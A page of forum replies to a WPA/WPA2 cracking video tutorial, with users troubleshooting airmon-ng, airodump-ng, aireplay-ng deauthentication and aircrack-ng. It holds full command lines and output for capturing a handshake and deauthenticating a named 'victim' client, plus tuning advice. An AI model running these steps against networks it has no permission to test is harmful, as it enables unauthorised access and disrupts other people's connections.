Page 34 of 36 FirstFirst ... 243233343536 LastLast
Results 331 to 340 of 358

Thread: -=Xploitz=- VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"

  1. #331
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default

    If you know for a fact there is a station connected, and im presuming you do, as you should on your own network then, you either to far away whats the power? your card is on the wrong channel
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  2. #332
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    10

    Default short tx

    Im reading this forum for quite a bite (^^) and just wanna said Thank, very helpfull and that helped me on securing my network after seeing that some people was using my bandwith withtout asking

    So Thank


    p.s sorry for bad english but im french ^^ trying to do my best so if you feel for some correction go for it, with will help me too

  3. #333
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    17

    Default

    First off I would like to Thank Xplotiz for the awesome video tutorial....


    I am having the same issue like mohsen1...the last command with results of "sending 64 directed DeAuth...." is this wrong? or is it my crappy card that I cannot get a handshake? I cannot even get my card to inject (highly believe it's my driver issue)...thinking on getting a real card now if it's really the problem.

    Quote Originally Posted by mohsen1 View Post
    bt ~ # airmon-ng stop ath0


    Code:
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    eth1            ZyDAS           zd1211rw
    bt ~ # airmon-ng start wifi0

    Code:
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    eth1            ZyDAS           zd1211rw
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)



    bt ~ # airodump-ng ath0

    Code:
     CH 13 ][ Elapsed: 32 s ][ 2008-07-25 18:51
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:13:46:1C:A5:AB   26       39        0    0   9  54. WEP  WEP         Persian_IT
     00:11:50:1C:D3:1D   18       37        0    0  11  54  WPA  TKIP   PSK  belkin54g
     00:D0:D6:0A:04:16   12       17        0    0  11  54. WEP  WEP         LAN1-AP045941
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes




    airodump-ng -c 11 -w wpa --bssid 00:11:50:1C3:1D ath0
    Code:
     CH 11 ][ Elapsed: 3 mins ][ 2008-07-25 20:00
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:11:50:1C:D3:1D   20  80     1774      137    0  11  54  WPA  TKIP   PSK  belkin54g
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    
     00:11:50:1C:D3:1D  E8:8D:75:DE:80:5C   17   0- 1     0      147
     00:11:50:1C:D3:1D  00:1E:4C:AF:89:59    9   1- 1     0      154  belkin54g


    bt ~ # aireplay-ng -0 1 -a 00:11:50:1C3:1D -c e8:8d:75:de:80:5c ath0

    Code:
    20:01:34  Waiting for beacon frame (BSSID: 00:11:50:1C:D3:1D) on channel 11
    20:01:34  Sending 64 directed DeAuth. STMAC: [E8:8D:75:DE:80:5C] [ 0| 1 ACKs]

    i am using backtrack 3 final instaled on my hard drive

    Thank You

  4. #334
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by llvllonk View Post
    First off I would like to Thank Xplotiz for the awesome video tutorial....


    I am having the same issue like mohsen1...the last command with results of "sending 64 directed DeAuth...." is this wrong? or is it my crappy card that I cannot get a handshake? I cannot even get my card to inject (highly believe it's my driver issue)...thinking on getting a real card now if it's really the problem.
    Sending out a deauth packet will require that your card is capable of injecting. What steps have you taken to confirm that you are unable to inject?

    The best way to test your card is to perform the injection test in aireplay-ng (-9) and if it indeed is unsuccessful it might be related to either your card or the driver. Do a search on the forum with your card model and I am sure you will find some more information on whether it is supported or not.
    -Monkeys are like nature's humans.

  5. #335
    Just burned his ISO
    Join Date
    Jul 2006
    Posts
    17

    Default

    I'm getting about 35 keys / sec which seems really slow. Is this normal?

  6. #336
    Junior Member mRM3e's Avatar
    Join Date
    Oct 2008
    Posts
    28

    Default

    Quote Originally Posted by JF1980 View Post
    I'm getting about 35 keys / sec which seems really slow. Is this normal?
    Could you explain a little further?
    I feel sorry for them - those who take authority as the truth and not truth as the authority -- Zeitgeist

  7. #337
    Just burned his ISO
    Join Date
    Jul 2006
    Posts
    17

    Default

    I'm not sure how I could make that any more straightforward of a question. I get about 35 keys per second while using aircrack-ng; this seems slow. Is that normal or do I have a problem with my setup?

  8. #338
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    17

    Default

    Quote Originally Posted by =Tron= View Post
    Sending out a deauth packet will require that your card is capable of injecting. What steps have you taken to confirm that you are unable to inject?

    The best way to test your card is to perform the injection test in aireplay-ng (-9) and if it indeed is unsuccessful it might be related to either your card or the driver. Do a search on the forum with your card model and I am sure you will find some more information on whether it is supported or not.
    Thanks Tron. I did the suggested test and it fails, that's why I think injection does not work. Offensive-Security site (backtrack.offensive-security.com/index.php/HCL:Wireless) states my Netgear MA401 is able to inject with HostAP driver. Hostap site (hostap.epitest.fi) have a new driver than the built in BT3 (however, being the noob that I am....troubles updating the driver due to some changes in directories I believe).

    Today, the strange thing was that I injected successfully one time with fakeauth in attempt to crack WEP; don't know if it was luck or not, because it didn't work afterwards...

    So yea, still trying to update the driver...but I think I'll try a wep crack again...don't know why it worked once (i was spamming the command O.o)

  9. #339
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    10

    Default

    thanks for the great tutorial....i now understand how this works my only issue is the handshake...im deauthing
    Sending 64 directed DeAuth. STMAC: [00:1F:29:F8:3F:3A] [14|20 ACKs]

    but am having no luck with the 4 way , i deauth it like 20 times, sometimes i get more acks sometimes less.....any ideas?

  10. #340

    Default

    Quote Originally Posted by CableTech View Post
    thanks for the great tutorial....i now understand how this works my only issue is the handshake...im deauthing
    Sending 64 directed DeAuth. STMAC: [00:1F:29:F8:3F:3A] [14|20 ACKs]

    but am having no luck with the 4 way , i deauth it like 20 times, sometimes i get more acks sometimes less.....any ideas?
    What kind of client are you deauthing? Sometimes linux will not auto-reconnect to a WPA network.

    Sending 64 directed DeAuth
    ! 64 times is probably overkill. Remember, the purpose of sending a deauth packet is to force the client to reconnect. Your victim may be dieing from so many deauths. Cut it down to 3 or 4 deauth packets.

    You don't mention how long you wait for the client to re-auth? It can take a few minutes depending on the victims wireless management software. Do you see your victim box loose it's connection and do you see the victim reconnect?

    Make sure you are sniffing only on the channel your victim and AP are using.

    Have you looked through your capture using wireshark to see if you have captured the 4 way handshake? Filter for "eapol" (no quotes) to check.

    Without knowing exactly what you did command (and response) wise, that's about all I can think to check.

    Good Luck...

Page 34 of 36 FirstFirst ... 243233343536 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •